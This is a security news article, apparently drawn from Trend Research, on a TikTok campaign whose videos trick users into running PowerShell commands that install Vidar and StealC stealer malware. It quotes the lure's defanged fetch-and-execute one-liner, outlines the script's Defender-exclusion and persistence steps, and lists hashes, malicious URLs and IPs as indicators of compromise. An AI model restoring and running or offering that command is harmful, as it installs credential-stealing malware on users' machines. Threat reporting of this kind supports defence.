Beware of Trending TikTok Videos Promoting Pirated Apps That Deliver Stealer Malware


A sophisticated social engineering campaign has surfaced on TikTok, leveraging the platform’s massive user base and algorithmic reach to distribute information-stealing malware, specifically Vidar and StealC.

Identified by Trend Research, this attack uses potentially AI-generated videos to deceive users into executing malicious PowerShell commands under the guise of activating pirated software like Windows OS, Microsoft Office, CapCut, and Spotify.

Unlike traditional malware delivery methods such as fake CAPTCHA pages, this campaign relies entirely on video content to socially engineer victims, making it harder for conventional security tools to detect and block the threat.

– Advertisement –

Emerging Social Engineering Threat on Social Media

The campaign begins with TikTok accounts, such as @gitallowed and others like @zane.houghton and @allaivo2, posting instructional videos that guide users to run PowerShell commands.

Stealer Malware
The profile page of a TikTok user account

These videos, which have garnered significant engagement one reaching over 500,000 views present step-by-step instructions to press Windows + R, type “powershell,” and execute a command like “iex (irm hxxps://allaivo[.]me/spotify)” to download a malicious script.

This script (SHA256: b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) creates hidden directories in APPDATA and LOCALAPPDATA, adds them to Windows Defender exclusions, and fetches a secondary payload identified as Vidar or StealC from URLs like hxxps://amssh[.]co/file.exe.

Stealer Malware
malicious PowerShell script

Technical Breakdown of the Attack Chain

The malware establishes persistence via registry keys and connects to command-and-control (C&C) servers, including hxxps://steamcommunity[.]com/profiles/76561199846773220 for Vidar, often using legitimate services like Steam and Telegram as Dead Drop Resolvers to mask C&C infrastructure.

The attack’s use of AI-generated content and verbal instructions within videos highlights a shift towards scalable, evasive tactics that exploit user trust rather than detectable code .

The implications for both individuals and businesses are severe, as Vidar and StealC can lead to data exfiltration, credential theft, and compromise of sensitive systems.

With no malicious code embedded in the platform itself, traditional defenses like link scanning or domain reputation checks are less effective.

According to the Report, Trend Vision One offers detection and blocking of associated Indicators of Compromise (IOCs), alongside hunting queries and threat intelligence to help organizations identify and mitigate this threat early.

Security strategies must now prioritize social media monitoring, behavioral analysis for anomalous PowerShell usage, and enhanced user education to combat such visually and aurally delivered attacks.

Indicators of Compromise (IOCs)

TypeIndicator
File Hash3bb81c977bb34fadb3bdeac7e61193dd009725783fb2cf453e15ced70fc39e9b
File Hashafc72f0d8f24657d0090566ebda910a3be89d4bdd68b029a99a19d146d63adc5
File Hashb8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886
URLhxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php
URLhxxps://allaivo[.]me/spotify
URLhxxps://amssh[.]co/file[.]exe
URLhxxps://amssh[.]co/script[.]ps1
URLhxxps://steamcommunity[.]com/profiles/76561199846773220
URLhxxps://t[.]me/v00rd
IPhxxps://49[.]12[.]113[.]201
IPhxxps://116[.]202[.]6[.]216

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates



Source link